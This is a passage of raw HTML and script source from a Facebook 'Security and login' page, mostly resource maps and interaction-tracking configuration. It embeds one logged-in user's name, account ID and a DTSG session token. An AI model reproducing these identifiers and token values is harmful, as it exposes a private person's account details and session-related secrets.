uZajCsvINSZ.css","permanent":1,"crossOrigin":1},"YFvtE":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3i6774\\/y_\\/l\\/en_GB\\/pw3IAhr7NVe.js","crossOrigin":1},"1vdgS":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iE9h4\\/ym\\/l\\/en_GB\\/Duj1HjHjIgL.js","crossOrigin":1},"mSUhA":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yl\\/r\\/fYf3vMZDpz4.js","crossOrigin":1},"BK1Rg":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y-\\/l\\/0,cross\\/4Wz9dQQDx1t.css","permanent":1,"crossOrigin":1},"A3pIY":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yA\\/l\\/0,cross\\/zgqyBlcld0h.css","permanent":1,"crossOrigin":1},"gOX6r":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iX074\\/yL\\/l\\/en_GB\\/D_B07CcaMyw.js","crossOrigin":1},"cVyaN":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3itqA4\\/y9\\/l\\/en_GB\\/4VSdyFMWqFF.js","crossOrigin":1},"TB1SC":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3io0N4\\/y0\\/l\\/en_GB\\/AmxMXESU8CZ.js","crossOrigin":1},"GefKK":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y_\\/r\\/lGraepHYWjI.js","crossOrigin":1},"U9VPm":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yg\\/r\\/68b8UMSMbbZ.js","crossOrigin":1},"ZU1ro":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yU\\/r\\/QKWIqWeZBgJ.js","crossOrigin":1},"QiTN\\/":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yf\\/r\\/61NhUyuVcYi.js","crossOrigin":1},"hIek+":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y8\\/r\\/ipN8XbWZsma.js","crossOrigin":1}});if (true) {Bootloader.enableBootload({"GroupCommerceProductDetail.react":{"resources":["NHGTD","MZjQ\\/","p5xuU","NmVPR","8iwhq","XZrv9","kG13J","mVaij","xbczi","nJpkm","\\/NvwD","AMXo2","Bee0v","rdSEf","dIFKP","dZMhS","27fPb","IO8eo","C\\/4sM","rzQjB","zpNP2","Pfi8i","MbCGD","sQ7ef"],"needsAsync":1,"module":1},"TimeSliceInteractionsLiteTypedLogger":{"resources":["CgPd8","IO8eo"],"needsAsync":1,"module":1},"WebSpeedInteractionsTypedLogger":{"resources":["IO8eo","b8jiw"],"needsAsync":1,"module":1},"MarketplacePermalinkRender":{"resources":["7QJhq","5V0iE","2afvQ","NHGTD","ZzF74","DPlsB","MZjQ\\/","BEw9R","rdVJI","p5xuU","NmVPR","6PS40","LbGET","l2Wpa","ASgw6","vAyw6","utT+H","kG13J","P5aPI","np5Vl","nJpkm","\\/NvwD","AMXo2","i+Psk","oHpkH","kHLQg","d3eut","dlBY6","Bee0v","rdSEf","AfZgB","0n0v6","9yswz","dIFKP","27fPb","wQoYj","VmI+z","IO8eo","9pP5B","GUjcw","C\\/4sM","rzQjB","zpNP2","Xxho8","q+9No","5p2rH","Pfi8i","onpAC","rhrSw","MbCGD","jAeyQ","IEK7S","Z\\/YBy","L1Ggk","sQ7ef","+kAgJ","+DAiS"],"needsAsync":1,"module":1},"AsyncRequest":{"resources":["Bee0v","IO8eo"],"needsAsync":1,"module":1},"DOM":{"resources":["Bee0v","IO8eo"],"needsAsync":1,"module":1},"ErrorSignal":{"resources":["nvklr","Bee0v","IO8eo","zpNP2","q+9No"],"needsAsync":1,"module":1},"Form":{"resources":["Bee0v","IO8eo"],"needsAsync":1,"module":1},"FormSubmit":{"resources":["yz+Sw","Bee0v","IO8eo"],"needsAsync":1,"module":1},"Input":{"resources":["IO8eo"],"needsAsync":1,"module":1},"Live":{"resources":["d25Q1","Bee0v","IO8eo","zpNP2","q+9No"],"needsAsync":1,"module":1},"Toggler":{"resources":["Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"Tooltip":{"resources":["\\/NvwD","Bee0v","IO8eo","zpNP2","sQ7ef"],"needsAsync":1,"module":1},"URI":{"resources":[],"needsAsync":1,"module":1},"trackReferrer":{"resources":[],"needsAsync":1,"module":1},"PhotoTagApproval":{"resources":["\\/mnVq","Bee0v","fE\\/jf","IO8eo"],"needsAsync":1,"module":1},"PhotoSnowlift":{"resources":["NmVPR","xlBl+","np5Vl","nJpkm","\\/NvwD","AMXo2","Bee0v","rdSEf","fE\\/jf","dIFKP","dZMhS","IO8eo","zpNP2","Kgq8n","q+9No","Pfi8i","onpAC","MbCGD","87rxF","Bf4nG","sQ7ef"],"needsAsync":1,"module":1},"PhotoTagger":{"resources":["YFvtE","NmVPR","1vdgS","mSUhA","\\/NvwD","Bee0v","fE\\/jf","BK1Rg","A3pIY","IO8eo","zpNP2","q+9No","gOX6r","cVyaN","sQ7ef"],"needsAsync":1,"module":1},"PhotoTags":{"resources":["\\/mnVq","Bee0v","fE\\/jf","IO8eo"],"needsAsync":1,"module":1},"TagTokenizer":{"resources":["\\/mnVq","kHLQg","Bee0v","TB1SC","27fPb","IO8eo","Pfi8i","MbCGD","sQ7ef"],"needsAsync":1,"module":1},"AsyncDialog":{"resources":["\\/NvwD","Bee0v","IO8eo","q+9No","sQ7ef"],"needsAsync":1,"module":1},"Hovercard":{"resources":["1vdgS","\\/NvwD","Bee0v","A3pIY","IO8eo","zpNP2","sQ7ef"],"needsAsync":1,"module":1},"Banzai":{"resources":["IO8eo"],"needsAsync":1,"module":1},"BanzaiODS":{"resources":["IO8eo"],"needsAsync":1,"module":1},"Parent":{"resources":[],"needsAsync":1,"module":1},"csx":{"resources":["IO8eo"],"needsAsync":1,"module":1},"ResourceTimingBootloaderHelper":{"resources":["nvklr","IO8eo"],"needsAsync":1,"module":1},"TimeSliceHelper":{"resources":["GefKK"],"needsAsync":1,"module":1},"MarketplaceSnowliftRoute":{"resources":["NmVPR","i+Psk","Bee0v","dIFKP","IO8eo","C\\/4sM","rzQjB","MbCGD"],"needsAsync":1,"module":1},"XSalesPromoWWWDetailsDialogAsyncController":{"resources":["U9VPm","IO8eo"],"needsAsync":1,"module":1},"BanzaiStream":{"resources":["ZU1ro","IO8eo","zpNP2"],"needsAsync":1,"module":1},"SnappyCompressUtil":{"resources":["zpNP2"],"needsAsync":1,"module":1},"GeneratedArtilleryUserTimingSink":{"resources":["QiTN\\/"],"needsAsync":1,"module":1},"XOfferController":{"resources":["hIek+","IO8eo"],"needsAsync":1,"module":1},"PerfXSharedFields":{"resources":["nvklr"],"needsAsync":1,"module":1}});}}); </script> <script> require("TimeSlice").guard(function() {(require("ServerJSDefine")).handleDefines([]);new (require("ServerJS"))().handle({"require":[["ScriptPath","set",[],["WebSettingsController","cf7212f2",{"imp_id":"8d0cd761"}]]]});}, "ServerJS define", {"root":true})(); </script> <title id="pageTitle"> Security and login </title> <link href="/osd.xml" rel="search" title="Facebook" type="application/opensearchdescription+xml"/> <link href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico" rel="shortcut icon"/> <script> require("TimeSlice").guard(function() {(require("ServerJSDefine")).handleDefines([["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["BootloaderConfig",[],{"jsRetries":[200,500],"jsRetryAbortNum":2,"jsRetryAbortTime":5,"payloadEndpointURI":"https:\\/\\/www.facebook.com\\/ajax\\/haste-response\\/","assumeNotNonblocking":false,"assumePermanent":true,"skipEndpoint":true},329],["CSSLoaderConfig",[],{"timeout":5000,"modulePrefix":"BLCSS:","loadEventSupported":true},619],["CookieCoreConfig",[],{"a11y":\{},"act":\{},"c_user":\{},"ddid":{"p":"\\/deferreddeeplink\\/","t":2419200},"dpr":{"t":604800},"js_ver":{"t":604800},"locale":{"t":604800},"lh":{"t":604800},"m_pixel_ratio":{"t":604800},"noscript":\{},"pnl_data2":{"t":2},"presence":\{},"sW":\{},"sfau":\{},"wd":{"t":604800},"x-referer":\{},"x-src":{"t":1}},2104],["CurrentCommunityInitialData",[],\{},490],["CurrentUserInitialData",[],{"USER_ID":"100022900869586","ACCOUNT_ID":"100022900869586","NAME":"Ldah Cereno","SHORT_NAME":"Ldah","IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false},270],["DTSGInitialData",[],{"token":"AQHakK5POakl:AQFLsAVBLPpJ"},258],["EventConfig",[],{"sampling":{"bandwidth":0,"play":0,"playing":0,"progress":0,"pause":0,"ended":0,"seeked":0,"seeking":0,"waiting":0,"loadedmetadata":0,"canplay":0,"selectionchange":0,"change":0,"timeupdate":2000000,"adaptation":0,"focus":0,"blur":0,"load":0,"error":0,"message":0,"abort":0,"storage":0,"scroll":200000,"mousemove":20000,"mouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{"BlueBarAccountChevronMenu":" _5lxs(?: .*)?$","BlueBarHomeButton":" _bluebarLinkHome__interaction-root(?: .*)?$","BlueBarProfileLink":" _1k67(?: .*)?$","ReactComposerSproutMedia":" _1pnt(?: .*)?$","ReactComposerSproutAlbum":" _1pnu(?: .*)?$","ReactComposerSproutNote":" _3-9x(?: .*)?$","ReactComposerSproutLocation":" _1pnv(?: .*)?$","ReactComposerSproutActivity":" _1pnz(?: .*)?$","ReactComposerSproutPeople":" _1pn-(?: .*)?$","ReactComposerSproutLiveVideo":" _5tv7(?: .*)?$","ReactComposerSproutMarkdown":" _311p(?: .*)?$","ReactComposerSproutFormattedText":" _mwg(?: .*)?$","ReactComposerSproutSticker":" _2vri(?: .*)?$","ReactComposerSproutSponsor":" _5t5q(?: .*)?$","ReactComposerSproutEllipsis":" _1gr3(?: .*)?$","ReactComposerSproutContactYourRepresentative":" _3cnv(?: .*)?$","ReactComposerSproutFunFact":" _2_xs(?: .*)?$","TextExposeSeeMoreLink":" see_more_link(?: .*)?$","SnowliftBigCloseButton":"(?: _xlt(?: .*)? _418x(?: .*)?$| _418x(?: .*)? _xlt(?: .*)?$)","SnowliftPrevPager":"(?: snowliftPager(?: .*)? prev(?: .*)?$| prev(?: .*)? snowliftPager(?: .*)?$)","SnowliftNextPager":"(?: snowliftPager(?: .*)? next(?: .*)?$| next(?: .*)? snowliftPager(?: .*)?$)","SnowliftFullScreenButton":"#fbPhotoSnowliftFullScreenSwitch( .+)*","PrivacySelectorMenu":"(?: _57di(?: .*)? _2wli(?: .*)?$| _2wli(?: .*)? _57di(?: .*)?$)","ReactComposerFeedXSprouts":" _nh6(?: .*)?$","SproutsComposerStatusTab":" _sg1(?: .*)?$","SproutsComposerLiveVideoTab":" _sg1(?: .*)?$","SproutsComposerAlbumTab":" _sg1(?: .*)?$","composerAudienceSelector":" _ej0(?: .*)?$","FeedHScrollAttachmentsPrevPager":" _1qqy(?: .*)?$","FeedHScrollAttachmentsNextPager":" _1qqz(?: .*)?$","DockChatTabFlyout":" fbDockChatTabFlyout(?: .*)?$","PrivacyLiteJewel":" _59fc(?: .*)?$","ActorSelector":" _6vh(?: .*)?$","LegacyMentionsInput":"(?: ReactLegacyMentionsInput(?: .*)? uiMentionsInput(?: .*)? _2xwx(?: .*)?$| uiMentionsInput(?: .*)? ReactLegacyMentionsInput(?: .*)? _2xwx(?: .*)?$| _2xwx(?: .*)? ReactLegacyMentionsInput(?: .*)? uiMentionsInput(?: .*)?$| ReactLegacyMentionsInput(?: .*)? _2xwx(?: .*)? uiMentionsInput(?: .*)?$| uiMentionsInput(?: .*)? _2xwx(?: .*)? ReactLegacyMentionsInput(?: .*)?$| _2xwx(?: .*)? uiMentionsInput(?: .*)? ReactLegacyMentionsInput(?: .*)?$)","UFIActionLinksEmbedLink":" _2g1w(?: .*)?$","UFIPhotoAttachLink":" UFIPhotoAttachLinkWrapper(?: .*)?$","UFIMentionsInputProxy":" _1osa(?: .*)?$","UFIMentionsInputDummy":" _1osc(?: .*)?$","UFIOrderingModeSelector":" _3scp(?: .*)?$","UFIPager":"(?: UFIPagerRow(?: .*)? UFIRow(?: .*)?$| UFIRow(?: .*)? UFIPagerRow(?: .*)?$)","UFIReplyRow":"(?: UFIReplyRow(?: .*)? UFICommentReply(?: .*)?$| UFICommentReply(?: .*)? UFIReplyRow(?: .*)?$)","UFIReplySocialSentence":" UFIReplySocialSentenceRow(?: .*)?$","UFIShareLink":" _5f9b(?: .*)?$","UFIStickerButton":" UFICommentStickerButton(?: .*)?$","MentionsInput":" _5yk1(?: .*)?$","FantaChatTabRoot":" _3_9e(?: .*)?$","SnowliftViewableRoot":" _2-sx(?: .*)?$","ReactBlueBarJewelButton":" _5fwr(?: .*)?$","UFIReactionsDialogLayerImpl":" _1oxk(?: .*)?$","UFIReactionsLikeLinkImpl":" _4x9_(?: .*)?$","UFIReactionsLinkImplRoot":" _khz(?: .*)?$","Reaction":" _iuw(?: .*)?$","UFIReactionsMenuImpl":" _iu-(?: .*)?$","UFIReactionsSpatialReactionIconContainer":" _1fq9(?: .*)?$","VideoComponentPlayButton":" _bsl(?: .*)?$","FeedOptionsPopover":" _b1e(?: .*)?$","UFICommentLikeCount":" UFICommentLikeButton(?: .*)?$","UFICommentLink":" _5yxe(?: .*)?$","ChatTabComposerInputContainer":" _552h(?: .*)?$","ChatTabHeader":" _15p4(?: .*)?$","DraftEditor":" _5rp7(?: .*)?$","ChatSideBarDropDown":" _5vm9(?: .*)?$","SearchBox":" _539-(?: .*)?$","ChatSideBarLink":" _55ln(?: .*)?$","MessengerSearchTypeahead":" _3rh8(?: .*)?$","NotificationListItem":" _33c(?: .*)?$","MessageJewelListItem":" messagesContent(?: .*)?$","Messages_Jewel_Button":" _3eo8(?: .*)?$","Notifications_Jewel_Button":" _3eo9(?: .*)?$","snowliftopen":" _342u(?: .*)?$","NoteTextSeeMoreLink":" _3qd_(?: .*)?$","fbFeedOptionsPopover":" _1he6(?: .*)?$","Requests_Jewel_Button":" _3eoa(?: .*)?$","UFICommentActionLinkAjaxify":" _15-3(?: .*)?$","UFICommentActionLinkRedirect":" _15-6(?: .*)?$","UFICommentActionLinkDispatched":" _15-7(?: .*)?$","UFICommentCloseButton":" _36rj(?: .*)?$","UFICommentActionsRemovePreview":" _460h(?: .*)?$","UFICommentActionsReply":" _460i(?: .*)?$","UFICommentActionsSaleItemMessage":" _460j(?: .*)?$","UFICommentActionsAcceptAnswer":" _460k(?: .*)?$","UFICommentActionsUnacceptAnswer":" _460l(?: .*)?$","UFICommentReactionsLikeLink":" _3-me(?: .*)?$","UFICommentMenu":" _1-be(?: .*)?$","UFIMentionsInputFallback":" _289b(?: .*)?$","UFIMentionsInputComponent":" _289c(?: .*)?$","UFIMentionsInputProxyInput":" _432z(?: .*)?$","UFIMentionsInputProxyDummy":" _432-(?: .*)?$","UFIPrivateReplyLinkMessage":" _14hj(?: .*)?$","UFIPrivateReplyLinkSeeReply":" _14hk(?: .*)?$","ChatCloseButton":" _4vu4(?: .*)?$","ChatTabComposerPhotoUploader":" _13f-(?: .*)?$","ChatTabComposerGroupPollingButton":" _13f_(?: .*)?$","ChatTabComposerGames":" _13ga(?: .*)?$","ChatTabComposerPlan":" _13gb(?: .*)?$","ChatTabComposerFileUploader":" _13gd(?: .*)?$","ChatTabStickersButton":" _13ge(?: .*)?$","ChatTabComposerGifButton":" _13gf(?: .*)?$","ChatTabComposerEmojiPicker":" _13gg(?: .*)?$","ChatTabComposerLikeButton":" _13gi(?: .*)?$","ChatTabComposerP2PButton":" _13gj(?: .*)?$","ChatTabComposerQuickCam":" _13gk(?: .*)?$","ChatTabHeaderAudioRTCButton":" _461a(?: .*)?$","ChatTabHeaderVideoRTCButton":" _461b(?: .*)?$","ChatTabHeaderOptionsButton":" _461_(?: .*)?$","ChatTabHeaderAddToThreadButton":" _4620(?: .*)?$","ReactComposerMediaSprout":" _fk5(?: .*)?$","UFIReactionsBlingSocialSentenceComments":" _-56(?: .*)?$","UFIReactionsBlingSocialSentenceSeens":" _2x0l(?: .*)?$","UFIReactionsBlingSocialSentenceShares":" _2x0m(?: .*)?$","UFIReactionsBlingSocialSentenceViews":" _-5c(?: .*)?$","UFIReactionsBlingSocialSentence":" _-5d(?: .*)?$","UFIReactionsSocialSentence":" _1vaq(?: .*)?$","VideoFullscreenButton":" _39ip(?: .*)?$","Tahoe":" _400z(?: .*)?$","TahoeFromVideoPlayer":" _1vek(?: .*)?$","TahoeFromVideoLink":" _2-40(?: .*)?$","TahoeFromPhoto":" _2ju5(?: .*)?$","FBStoryTrayItem":" _1fvw(?: .*)?$","Mobile_Feed_Jewel_Button":"#feed_jewel( .+)*","Mobile_Requests_Jewel_Button":"#requests_jewel( .+)*","Mobile_Messages_Jewel_Button":"#messages_jewel( .+)*","Mobile_Notifications_Jewel_Button":"#notifications_jewel( .+)*","Mobile_Search_Jewel_Button":"#search_jewel( .+)*","Mobile_Bookmarks_Jewel_Button":"#bookmarks_jewel( .+)*","Mobile_Feed_UFI_Comment_Button_Permalink":" _l-a(?: .*)?$","Mobile_Feed_UFI_Comment_Button_Flyout":" _4qeq(?: .*)?$","Mobile_Feed_UFI_Token_Bar_Flyout":" _4qer(?: .*)?$","Mobile_Feed_UFI_Token_Bar_Permalink":" _4-09(?: .*)?$","Mobile_UFI_Share_Button":" _15kr(?: .*)?$","Mobile_Feed_Photo_Permalink":" _1mh-(?: .*)?$","Mobile_Feed_Video_Permalink":" _65g_(?: .*)?$","Mobile_Feed_Profile_Permalink":" _4kk6(?: .*)?$","Mobile_Feed_Story_Permalink":" _26yo(?: .*)?$","Mobile_Feed_Page_Permalink":" _4e81(?: .*)?$","Mobile_Feed_Group_Permalink":" _20u1(?: .*)?$","Mobile_Feed_Event_Permalink":" _20u0(?: .*)?$","ProfileIntroCardAddFeaturedMedia":" _30qr(?: .*)?$","ProfileSectionAbout":" _Interaction__ProfileSectionAbout(?: .*)?$","ProfileSectionAllRelationships":" _Interaction__ProfileSectionAllRelationships(?: .*)?$","ProfileSectionAtWork":" _2fnv(?: .*)?$","ProfileSectionContactBasic":" _Interaction__ProfileSectionContactBasic(?: .*)?$","ProfileSectionEducation":" _Interaction__ProfileSectionEducation(?: .*)?$","ProfileSectionOverview":" _Interaction__ProfileSectionOverview(?: .*)?$","ProfileSectionPlaces":" _Interaction__ProfileSectionPlaces(?: .*)?$","ProfileSectionYearOverviews":" _Interaction__ProfileSectionYearOverviews(?: .*)?$","IntlPolyglotHomepage":" _Interaction__IntlPolyglotVoteActivityCardButton(?: .*)?$","ProtonElementSelection":" _67ft(?: .*)?$"},"interaction_boost":{"SnowliftPrevPager":0.2,"SnowliftNextPager":0.2,"ChatSideBarLink":2,"MessengerSearchTypeahead":2,"Messages_Jewel_Button":2.5,"Notifications_Jewel_Button":1.5,"Tahoe":30,"ProtonElementSelection":4},"event_types":{"BlueBarAccountChevronMenu":["click"],"BlueBarHomeButton":["click"],"BlueBarProfileLink":["click"],"ReactComposerSproutMedia":["click"],"ReactComposerSproutAlbum":["click"],"ReactComposerSproutNote":["click"],"ReactComposerSproutLocation":["click"],"ReactComposerSproutActivity":["click"],"ReactComposerSproutPeople":["click"],"ReactComposerSproutLiveVideo":["click"],"ReactComposerSproutMarkdown":["click"],"ReactComposerSproutFormattedText":["click"],"ReactComposerSproutSticker":["click"],"ReactComposerSproutSponsor":["click"],"ReactComposerSproutEllipsis":["click"],"ReactComposerSproutContactYourRepresentative":["click"],"ReactComposerSproutFunFact":["click"],"TextExposeSeeMoreLink":["click"],"SnowliftBigCloseButton":["click"],"SnowliftPrevPager":["click"],"SnowliftNextPager":["click"],"SnowliftFullScreenButton":["click"],"PrivacySelectorMenu":["click"],"ReactComposerFeedXSprouts":["click"],"SproutsComposerStatusTab":["click"],"SproutsComposerLiveVideoTab":["click"],"SproutsComposerAlbumTab":["click"],"composerAudienceSelector":["click"],"FeedHScrollAttachmentsPrevPager":["click"],"FeedHScrollAttachmentsNextPager":["click"],"DockChatTabFlyout":["click"],"PrivacyLiteJewel":["click"],"ActorSelector":["click"],"LegacyMentionsInput":["click"],"UFIActionLinksEmbedLink":["click"],"UFIPhotoAttachLink":["click"],"UFIMentionsInputProxy":["click"],"UFIMentionsInputDummy":["click"],"UFIOrderingModeSelector":["click"],"UFIPager":["click"],"UFIReplyRow":["click"],"UFIReplySocialSentence":["click"],"UFIShareLink":["click"],"UFIStickerButton":["click"],"MentionsInput":["click"],"FantaChatTabRoot":["click"],"SnowliftViewableRoot":["click"],"ReactBlueBarJewelButton":["click"],"UFIReactionsDialogLayerImpl":["click"],"UFIReactionsLikeLinkImpl":["click"],"UFIReactionsLinkImplRoot":["click"],"Reaction":["click"],"UFIReactionsMenuImpl":["click"],"UFIReactionsSpatialReactionIconContainer":["click"],"VideoComponentPlayButton":["click"],"FeedOptionsPopover":["click"],"UFICommentLikeCount":["click"],"UFICommentLink":["click"],"ChatTabComposerInputContainer":["click"],"ChatTabHeader":["click"],"DraftEditor":["click"],"ChatSideBarDropDown":["click"],"SearchBox":["click"],"ChatSideBarLink":["mouseup"],"MessengerSearchTypeahead":["click"],"NotificationListItem":["click"],"MessageJewelListItem":["click"],"Messages_Jewel_Button":["click"],"Notifications_Jewel_Button":["click"],"snowliftopen":["click"],"NoteTextSeeMoreLink":["click"],"fbFeedOptionsPopover":["click"],"Requests_Jewel_Button":["click"],"UFICommentActionLinkAjaxify":["click"],"UFICommentActionLinkRedirect":["click"],"UFICommentActionLinkDispatched":["click"],"UFICommentCloseButton":["click"],"UFICommentActionsRemovePreview":["click"],"UFICommentActionsReply":["click"],"UFICommentActionsSaleItemMessage":["click"],"UFICommentActionsAcceptAnswer":["click"],"UFICommentActionsUnacceptAnswer":["click"],"UFICommentReactionsLikeLink":["click"],"UFICommentMenu":["click"],"UFIMentionsInputFallback":["click"],"UFIMentionsInputComponent":["click"],"UFIMentionsInputProxyInput":["click"],"UFIMentionsInputProxyDummy":["click"],"UFIPrivateReplyLinkMessage":["click"],"UFIPrivateReplyLinkSeeReply":["click"],"ChatCloseButton":["click"],"ChatTabComposerPhotoUploader":["click"],"ChatTabComposerGroupPollingButton":["click"],"ChatTabComposerGames":["click"],"ChatTabComposerPlan":["click"],"ChatTabComposerFileUploader":["click"],"ChatTabStickersButton":["click"],"ChatTabComposerGifButton":["click"],"ChatTabComposerEmojiPicker":["click"],"ChatTabComposerLikeButton":["click"],"ChatTabComposerP2PButton":["click"],"ChatTabComposerQuickCam":["click"],"ChatTabHeaderAudioRTCButton":["click"],"ChatTabHeaderVideoRTCButton":["click"],"ChatTabHeaderOptionsButton":["click"],"ChatTabHeaderAddToThreadButton":["click"],"ReactComposerMediaSprout":["click"],"UFIReactionsBlingSocialSentenceComments":["click"],"UFIReactionsBlingSocialSentenceSeens":["click"],"UFIReactionsBlingSocialSentenceShares":["click"],"UFIReactionsBlingSocialSentenceViews":["click"],"UFIReactionsBlingSocialSentence":["click"],"UFIReactionsSocialSentence":["click"],"VideoFullscreenButton":["click"],"Tahoe":["click"],"TahoeFromVideoPlayer":["click"],"TahoeFromVideoLink":["click"],"TahoeFromPhoto":["click"],"":["click"],"FBStoryTrayItem":["click"],"Mobile_Feed_Jewel_Button":["click"],"Mobile_Requests_Jewel_Button":["click"],"Mobile_Messages_Jewel_Button":["click"],"Mobile_Notifications_Jewel_Button":["click"],"Mobile_Search_Jewel_Button":["click"],"Mobile_Bookmarks_Jewel_Button":["click"],"Mobile_Feed_UFI_Comment_Button_Permalink":["click"],"Mobile_Feed_UFI_Comment_Button_Flyout":["click"],"Mobile_Feed_UFI_Token_Bar_Flyout":["click"],"Mobile_Feed_UFI_Token_Bar_Permalink":["click"],"Mobile_UFI_Share_Button":["click"],"Mobile_Feed_Photo_Permalink":["click"],"Mobile_Feed_Video_Permalink":["click"],"Mobile_Feed_Profile_Permalink":["click"],"Mobile_Feed_Story_Permalink":["click"],"Mobile_Feed_Page_Permalink":["click"],"Mobile_Feed_Group_Permalink":["click"],"Mobile_Feed_Event_Permalink":["click"],"ProfileIntroCardAddFeaturedMedia":["click"],"ProfileSectionAbout":["click"],"ProfileSectionAllRelationships":["click"],"ProfileSectionAtWork":["click"],"ProfileSectionContactBasic":["click"],"ProfileSectionEducation":["click"],"ProfileSectionOverview":["click"],"ProfileSectionPlaces":["click"],"ProfileSectionYearOverviews":["click"],"IntlPolyglotHomepage":["click"],"ProtonElementSelection":["click"]},"manual_instrumentation":true,"profile_eager_execution":true,"disable_heuristic":true,"disable_event_profiler":false},1726],["ISB",[],\{},330],["LSD",[],\{},323],["ServerNonce",[],{"ServerNonce":"UTdp71pKhef-d9WWnMfqTZ"},141],["SiteData",[],{"server_revision":4017402,"client_revision":4017402,"tier":"","push_phase":"C3","pkg_cohort":"PHASED:DEFAULT","pkg_cohort_key":"__pc","haste_site":"www","be_mode":1,"be_key":"__be","is_rtl":false,"spin":4,"__spin_r":4017402,"__spin_b":"trunk","__spin_t":1529235005,"vip":"185.60.216.38"},317],["SprinkleConfig",[],{"param_name":"jazoest"},2111],["UserAgentData",[],{"browserArchitecture":"32","browserFullVersion":"62.0.3202.89","browserMinorVersion":0,"browserName":"Chrome","browserVersion":62,"deviceName":"Unknown","engineName":"WebKit","engineVersion":"537.36","platformArchitecture":"32","platformName":"Linux","platformVersion":null,"platformFullVersion":null},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["AdsInterfacesSessionConfig",[],\{},2393],["TimeSliceInteractionSV",[],{"on_demand_reference_counting":true,"on_demand_profiling_counters":true,"default_rate":1000,"lite_default_rate":100,"interaction_to_lite_coinflip":{"ADS_INTERFACES_INTERACTION":0,"ads_perf_scenario":0,"ads_wait_time":0,"Event":1,"video_psr":0,"video_stall":0},"interaction_to_coinflip":{"ADS_INTERFACES_INTERACTION":1,"ads_perf_scenario":1,"ads_wait_time":1,"video_psr":1000000,"video_stall":2500000,"Event":100,"watch_carousel_left_scroll":1,"watch_carousel_right_scroll":1,"watch_sections_load_more":1,"watch_discover_scroll":1,"fbpkg_ui":1,"backbone_ui":1},"enable_heartbeat":true,"maxBlockMergeDuration":0,"maxBlockMergeDistance":0,"enable_banzai_stream":true,"user_timing_coinflip":50,"banzai_stream_coinflip":1,"compression_enabled":true,"ref_counting_fix":true,"ref_counting_cont_fix":false,"also_record_new_timeslice_format":false,"force_async_request_tracing_on":false},2609],["DataStoreConfig",[],{"useExpando":true},2915],["ArtilleryComponentSaverOptions",[],{"options":{"ads_wait_time_saver":{"shouldCompress":false,"shouldUploadSeparately":false},"ads_flux_profiler_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"timeslice_execution_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"interaction_async_request_join_data":{"shouldCompress":true,"shouldUploadSeparately":true},"resources_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"user_timing_saver":{"shouldCompress":false,"shouldUploadSeparately":false}}},3016],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5},3401],["ArtilleryExperiments",[],{"artillery_static_resources_pagelet_attribution":false,"artillery_timeslice_compressed_data":false,"artillery_miny_client_payload":false,"artillery_prolong_page_tracing":false,"artillery_navigation_timing_level_2":false,"artillery_profiler_on":false,"artillery_merge_max_distance_sec":1,"artillery_merge_max_duration_sec":1,"user_timing":false},1237]]);new (require("ServerJS"))().handle({"require":[["TimeSlice"],["markJSEnabled"],["lowerDomain"],["URLFragmentPrelude"],["Primer"],["BigPipe"],["Bootloader"],["SidebarPrelude","addSidebarMode",[],[1258]],["ArtilleryOnUntilOffLogging","disable",[],[]]]});}, "ServerJS define", {"root":true})(); </script> <link href="data:text/css; charset=utf-8,._3hx- ._4a9g{background-color:\%23fff}._3hx- ._1i6a{background:transparent}._3hx- ._1xdx\{clear:both;float:left;height:2px;position:relative;width:100%}._3hx- ._1xe8:after{background:white;content:'';display:block;height:100px;left:0;position:absolute;right:0;top:-100px;z-index:0}._3hx- ._1xdl{background:white;width:100%;z-index:0}._3hx- ._1xdw{background:white;height:100%;width:100%}._3hx- ._1xdm{position:relative;z-index:10}.fbNub._50mz._3hx- .loading{border-bottom:12px solid white;border-top:12px solid white;display:block;margin-bottom:0;margin-top:0}.fbNub._50mz._3hx- .fbNubFlyoutBody{background-color:transparent}._3hx- ._1aa6{padding:8px 10px}._3hx- ._419m{background-color:%23fff;border-left:6px solid white;margin-left:0}._3hx- .fbDockChatTabFlyout ._2v5j{background:transparent}._3hx- ._5wd4{border-bottom:1px solid white;padding-bottom:0}._3hx- ._5ijz.isFromOther{border-left:8px solid white;margin-left:0}._3hx- ._5wd4:last-child{border-bottom:none}._3hx- ._5wd4 ._5wd9{min-height:0}._3hx- ._5wd4 ._5wd9._ysk{border-right:18px solid white;margin-right:0}._3hx- ._1nc7 ._5wd9{border-left:none;margin-left:0}._3hx- ._2cnu:only-of-type ._5wdf{border-bottom:2px solid white;border-top:2px solid 